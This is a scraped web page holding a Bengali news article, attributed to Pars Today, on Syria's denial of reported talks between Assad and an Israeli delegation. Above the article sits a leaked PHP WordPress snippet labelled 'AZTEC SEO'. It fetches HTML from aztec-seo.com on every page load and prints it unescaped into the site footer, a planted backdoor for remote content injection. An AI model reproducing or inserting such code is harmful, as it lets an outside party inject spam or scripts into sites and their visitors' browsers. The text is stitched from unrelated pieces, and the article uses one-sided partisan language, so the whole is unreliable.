/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
ইহুদিবাদী ইসরাইলের সঙ্গে বৈঠকে বসার খবর তীব্র ভাষায় প্রত্যাখ্যান করেছে সিরিয়া। দামেস্ক বলেছে, যেসব ‘ভাড়াটে গণমাধ্যম’ এ ধরনের মিথ্যাচার করছে তারা গোটা মধ্যপ্রাচ্যেকে ইসরাইলের পশ্চিমা মিত্রদের দলে ভেড়াতে চায়।
সিরিয়ার পররাষ্ট্র মন্ত্রণালয়ের এক বিবৃতির বরাত দিয়ে দেশটির সরকারি বার্তা সংস্থা সানা জানিয়েছে, “কিছু গণমাধ্যম ইসরাইল-সিরিয়া বৈঠক হওয়ার যে ভিত্তিহীন খবর প্রচার করেছে আরব প্রজাতন্ত্র সিরিয়া কঠোর ভাষায় তা প্রত্যাখ্যান করছে। পৃথিবীর কোনো স্থানে এমন কোনো বৈঠক হয়নি।
বিবৃতিতে বলা হয়, ইসরাইলি দখলদারিত্বের বিরুদ্ধে সিরিয়ার দীর্ঘকালের কঠোর অবস্থান সম্পর্কে জনমনে সংশয় সৃষ্টি করার অশুভ উদ্দেশ্যে কিছু ভাড়াটে গণমাধ্যম এ ধরনের মিথ্যাচার করছে।
সিরিয়ার পররাষ্ট্র মন্ত্রণালয়ের বিবৃতিতে বলা হয়েছে, আন্তর্জাতিক আইন অনুযায়ী গোটা গোলান মালভূমি ও ফিলিস্তিনি ভূখণ্ড ইহুদিবাদীদের জবরদখলমুক্ত করার মূলনীতি থেকে দামেস্ক কখনো সরে আসবে না। ইহুদিবাদী ইসরাইলের সঙ্গে যেসব মুসলিম দেশ সম্পর্ক স্বাভাবিক করার জন্য লাইনে দাঁড়িয়েছে সেসব দেশ সিরিয়া সম্পর্কে এ ধরনের উদ্ভট খবর প্রচার করছে বলে বিবৃতিতে উল্লেখ করা হয়।
সোমবার সিরিয়ার সরকার বিরোধী কিছু আরব পত্রিকা দাবি করেছিল, প্রেসিডেন্ট বাশার আাল-আসাদ সম্প্রতি সেদেশের হামেইমিম বিমান ঘাঁটিতে ইসরাইলের একটি সামরিক ও নিরাপত্তা প্রতিনিধিদলের সঙ্গে বৈঠক করেছেন। সূত্র : পার্সটুডে